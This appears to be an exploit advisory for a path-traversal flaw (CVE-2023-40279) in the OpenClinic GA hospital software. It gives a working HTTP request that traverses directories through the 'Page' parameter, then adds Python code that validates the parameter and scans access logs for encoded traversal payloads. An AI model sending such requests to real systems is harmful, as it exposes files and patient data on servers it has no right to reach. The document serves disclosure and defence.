# Exploit Title: OpenClinic GA 5.247.01 - Path Traversal (Authenticated)
# Date: 2023-08-14
# Exploit Author: V. B.
# Vendor Homepage: https://sourceforge.net/projects/open-clinic/
# Software Link: https://sourceforge.net/projects/open-clinic/
# Version: OpenClinic GA 5.247.01
# Tested on: Windows 10, Windows 11
# CVE: CVE-2023-40279

# Details
An issue was discovered in OpenClinic GA version 5.247.01, where an authenticated attacker can perform directory path traversal via the 'Page' parameter in a GET request to 'main.do'. The vulnerability allows the retrieval and execution of files from arbitrary directories.

# Proof of Concept (POC)
Steps to Reproduce:

1. Crafting the Malicious GET Request:
- Use a web browser or a tool capable of sending custom HTTP requests, such as curl or Burp Suite.
- Format the GET request as follows (in this example, `../../main.jsp` is used to traverse out of the intended directory and access `main.jsp`):
GET /openclinic/main.do?Page=../../main.jsp HTTP/1.1
Host:192.168.100.5:10088
Accept-Encoding: gzip, deflate
Accept:*/*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0(Windows NT 10.0; Win64; x64) AppleWebKit/537.36(KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36
Connection: close
Cookie: JSESSIONID=[SESSION ID]
Cache-Control: max-age=0

2. Confirming the Vulnerability:
- Send the crafted GET request to the target server.
- If the server responds with the content of the requested file (e.g., `main.jsp`) from outside the intended directory, the directory path traversal vulnerability is confirmed.
- This vulnerability can lead to sensitive information disclosure or more severe attacks.
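The defensive side of the issue above, as an added example that is not OpenClinic GA code: a server-side validator that confines a path-style `Page` value to an assumed page directory (the `PAGE_ROOT` constant is an assumption, not the product's real layout), and a scan over constructed access-log lines that reports requests whose `Page` value would not resolve inside that directory. The check canonicalises the value after bounded repeated URL-decoding and treats backslashes as separators, since the advisory's target runs on Windows.

```python
"""Defensive handling of a path-style 'Page' parameter.

Added example, not OpenClinic GA code. Two parts:
  * resolve_page(): a validator that confines the requested page to an
    assumed page directory (PAGE_ROOT), rejecting traversal, encoded
    traversal and absolute paths;
  * flag_traversal_requests(): a scan over access-log lines that reports
    requests whose 'Page' value fails that validator.
PAGE_ROOT and the log lines are constructed for illustration.
"""
import posixpath
import re
from typing import List, Optional, Tuple
from urllib.parse import parse_qs, unquote, urlsplit

PAGE_ROOT = "/openclinic/pages"  # assumed location of legitimate page files

REQUEST_LINE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')


def resolve_page(page_param: str) -> Optional[str]:
    """Return the canonical path for page_param if it stays inside PAGE_ROOT,
    otherwise None.

    Decoding is repeated (bounded) so a double-encoded sequence such as
    %252e%252e%252f is normalised before the containment check. Backslashes
    are treated as separators because the target runs on Windows.
    """
    decoded = page_param
    for _ in range(3):
        again = unquote(decoded)
        if again == decoded:
            break
        decoded = again
    decoded = decoded.replace("\\", "/")
    # NUL bytes and absolute paths are never legitimate page names
    if "\x00" in decoded or decoded.startswith("/"):
        return None
    candidate = posixpath.normpath(posixpath.join(PAGE_ROOT, decoded))
    # normpath collapses '..' segments; anything that climbed out of PAGE_ROOT
    # (or resolved to PAGE_ROOT itself) is rejected
    if not candidate.startswith(PAGE_ROOT + "/"):
        return None
    return candidate


def flag_traversal_requests(log_lines: List[str]) -> List[Tuple[str, str]]:
    """Return (client_ip, Page value) for each log line whose 'Page' parameter
    would not resolve inside PAGE_ROOT. parse_qs applies one URL-decoding
    pass; resolve_page handles any further encoding layers."""
    hits = []
    for line in log_lines:
        match = REQUEST_LINE.search(line)
        if not match:
            continue
        query = parse_qs(urlsplit(match.group(1)).query, keep_blank_values=True)
        for value in query.get("Page", []):
            if resolve_page(value) is None:
                hits.append((line.split(" ", 1)[0], value))
    return hits


# Constructed access-log lines (combined log format); not from a real system
SAMPLE_LOG = [
    '10.0.0.7 - - [14/Aug/2023:10:01:12 +0000] "GET /openclinic/main.do?Page=curative/index.jsp HTTP/1.1" 200 5120',
    '10.0.0.9 - - [14/Aug/2023:10:01:30 +0000] "GET /openclinic/main.do?Page=../../main.jsp HTTP/1.1" 200 2210',
    '10.0.0.9 - - [14/Aug/2023:10:01:45 +0000] "GET /openclinic/main.do?Page=%2e%2e%2f%2e%2e%2fmain.jsp HTTP/1.1" 200 2210',
    '10.0.0.9 - - [14/Aug/2023:10:02:01 +0000] "GET /openclinic/main.do?Page=..%5c..%5cmain.jsp HTTP/1.1" 200 2210',
]

if __name__ == "__main__":
    for ip, value in flag_traversal_requests(SAMPLE_LOG):
        print(f"traversal attempt from {ip}: Page={value!r}")
```

The validator is the fix pattern: resolve the user-supplied name against a fixed base directory and refuse anything whose canonical form leaves it, rather than trying to blacklist `..` substrings. The log scan reuses the same validator so that every encoding variant the validator rejects is also what the detection reports.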